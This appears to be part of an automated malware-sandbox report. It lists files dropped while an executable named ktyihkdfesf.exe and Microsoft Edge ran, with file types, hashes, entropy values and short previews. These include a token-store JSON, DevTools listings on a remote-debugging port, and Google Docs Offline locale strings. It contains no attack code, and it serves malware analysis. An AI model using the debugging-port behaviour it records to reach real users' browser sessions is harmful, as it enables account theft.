                                                                                                                                                                                                                                                                                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".l.q.C.1.S.H.p.x.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.C.t.g.l.0.y.
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):3500
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.395639551191737
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:6NnCTYDHCT0NnCgbC9NnCfYfYc9CfYfNnC9l5dgEC9XNnCWR9CWqNnCcDCrNnCvl:6NDNQNkYfYXYfN+l5wXNxRfqNr2NhuXL
                                                                                                                                                                                                                                                                                                MD5:BE43E67816E85B4184EF930D04487DC1
                                                                                                                                                                                                                                                                                                SHA1:59636F0EACE4562038F010B893EEDD62F600332F
                                                                                                                                                                                                                                                                                                SHA-256:3D8D386B5AD142142AE317DB2D0BC1781CA0160466F13C1A4911D105C6D3E85B
                                                                                                                                                                                                                                                                                                SHA-512:442E20F676EE7811EAFF91FC583FF0821BC701696AE9CDEA8208B2D0E86972AA235BE2C723AA4FA212AC36BF84D62C2EAC58D491BDA66300B34AAE948BA91CBA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/AC0547A737D75439EDB69F9AF3F6C2E6",.. "id": "AC0547A737D75439EDB69F9AF3F6C2E6",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/AC0547A737D75439EDB69F9AF3F6C2E6"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/9D600FB4572B8B97CACBB6920872FE21",.. "id": "9D600FB4572B8B97CACBB6920872FE21",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/9D600FB4572B8B97CACBB6920872FE21"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1787
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.372900845607154
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:SfNaoCuK1TECuLfNaoCcCzfNaoCIAZLCIBfNaoCZN+Zv0UrU0U8CZH:6NnCNTEC8NnCcCrNnCIAZLCIdNnCZN+K
                                                                                                                                                                                                                                                                                                MD5:5BF1E126B870669053B3C41A35E88FB7
                                                                                                                                                                                                                                                                                                SHA1:E96CE70C10AA52A02425286B4DBFEB3F17693769
                                                                                                                                                                                                                                                                                                SHA-256:D9EB9F9D857F0C999F6CB71DA61C823A7E633FAD16493122C73A3C9C4D696E71
                                                                                                                                                                                                                                                                                                SHA-512:5043D5CE3AE9F708A9A0B04B1EB2D333C5F5FE91B8A0EAB92EFEBEE9DFD160EEBDA7CBF27859BF890A0256CCE1F6A229D5A5F047B9BA3B95B9A538DA9C8E143F
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/9342920F61A5D3BCC349E21DD9980958",.. "id": "9342920F61A5D3BCC349E21DD9980958",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/9342920F61A5D3BCC349E21DD9980958"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/5A099DDCA11BCF4A15B05755F3B5AB94",.. "id": "5A099DDCA11BCF4A15B05755F3B5AB94",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/5A099DDCA11BCF4A15B05755F3B5AB94"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1571509
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.991887046441072
                                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                                SSDEEP:24576:NeBIUKcBUMcFDECxPYhQT5T4yUzLy1mfi5olodFsB7JU8HSaf2skMnBKyPjLu:3UKC2DNIQTh4LHy1mfixbsBNHxkMnFnu
                                                                                                                                                                                                                                                                                                MD5:B3D60BC6D62A05309C68CE12D83F3388
                                                                                                                                                                                                                                                                                                SHA1:59279A995E8E1B16C81AE8B5BC20EB39B098EBC0
                                                                                                                                                                                                                                                                                                SHA-256:04D2A2278E1E32C7491A2F660A0ECAD802EE48953A334A34ADE4D804F544BA77
                                                                                                                                                                                                                                                                                                SHA-512:956D9B6508A7D0C7506070C6BDC90ACE1A81041AE6BC70D0B2ABC52BA1F4F3A28D70213E531D077D8964F994B2EBAF92B3A934A47618DFA8FA5B81CFF27E6FD5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 41924
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):76314
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.996159328201069
                                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                                SSDEEP:1536:fFZ2cHkObrS5Vvm808scZeEzFrSpzBUl4MZIGM/iysAGz88:fbb1UdS8scZNzFrMa4M+lKqeZ
                                                                                                                                                                                                                                                                                                MD5:703D592C85D2790D89047C1614A54B4F
                                                                                                                                                                                                                                                                                                SHA1:0C08F096AD544A63ACE8AA1AA738CC0B374F2A23
                                                                                                                                                                                                                                                                                                SHA-256:A01513000969824FA1761DCDD77F5EE9B6FD958B4E9596522CEBC47BB69DF194
                                                                                                                                                                                                                                                                                                SHA-512:D0C0F0B0A060D3DD52942556615B93971292E1F0C10555681CB6E4857E605EB2CFBACBADD263FB954D4062A63BBCCCB4B514428FDB95F6C0C94CC221B28B1ED5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):206855
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.983996634657522
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEI5:l81Lel7E6lEMVo/S01fDpWmEgD
                                                                                                                                                                                                                                                                                                MD5:788DF0376CE061534448AA17288FEA95
                                                                                                                                                                                                                                                                                                SHA1:C3B9285574587B3D1950EE4A8D64145E93842AEB
                                                                                                                                                                                                                                                                                                SHA-256:B7FB1D3C27E04785757E013EC1AC4B1551D862ACD86F6888217AB82E642882A5
                                                                                                                                                                                                                                                                                                SHA-512:3AA9C1AA00060753422650BBFE58EEEA308DA018605A6C5287788C3E2909BE876367F83B541E1D05FE33F284741250706339010571D2E2D153A5C5A107D35001
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):154477
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                                MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                                SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                                SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                                SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1658
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.412002950787627
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:Y4MfJVe5wMd5wMe07cIF5Io0MY5kU2A0OpJ5xnL0MotJ5VovUx0Uw5fX0Uu5M:JIVuwEw5MUFZLBQLtQ0M
                                                                                                                                                                                                                                                                                                MD5:0677D7DA600FEB5C6FE94C606191E6F8
                                                                                                                                                                                                                                                                                                SHA1:C3BFC7907C418D26F66B2A1A3677BA1A594B4211
                                                                                                                                                                                                                                                                                                SHA-256:457E17CA061E1956C487E5689F3BEA8AE59BBDEB532007E624F18720701FABD4
                                                                                                                                                                                                                                                                                                SHA-512:759BEF56ABAAF215057F21FA16A0F24662C208714E1094E375BDE8F322AA47B71D82AEDD527A62D1B7FFFC34393045C4D49F94732064AC278E5DBB6AFC2AD8EB
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"logTime": "1005/061810", "correlationVector":"0kV+/vRB8ay0a3Cue7mk6o","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"AFo3IfjRT+3l4ojiXpMdNH","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"838E3BF9A44F456CB4AD62AC737EDD15","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063233", "correlationVector":"2N8fwTcZh6EtTfQ8o4+6aX","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063233", "correlationVector":"5ADEBA42608E4CC9A1FACA719F284CF9","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063346", "correlationVector":"xp/hBMCdVPtUIxZHIviv/x","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063347", "correlationVector":"BF0B9E58C0CC45ED9AB5D0371131E69A","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/064305", "correlationVector":"ONVjsWDap1LyjIRdxsqPGs","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/064305", "correlationVector":"82E52491
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):11185
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):154477
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                                MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                                SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                                SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                                SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):4982
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                                MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                                SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                                SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                                SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):908
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                                MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                                SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                                SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                                SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1285
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                                MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                                SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                                SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                                SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1244
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                                MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                                SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                                SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                                SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):977
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                                MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                                SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                                SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                                SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):3107
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                                MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                                SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                                SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                                SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                                Malicious:false
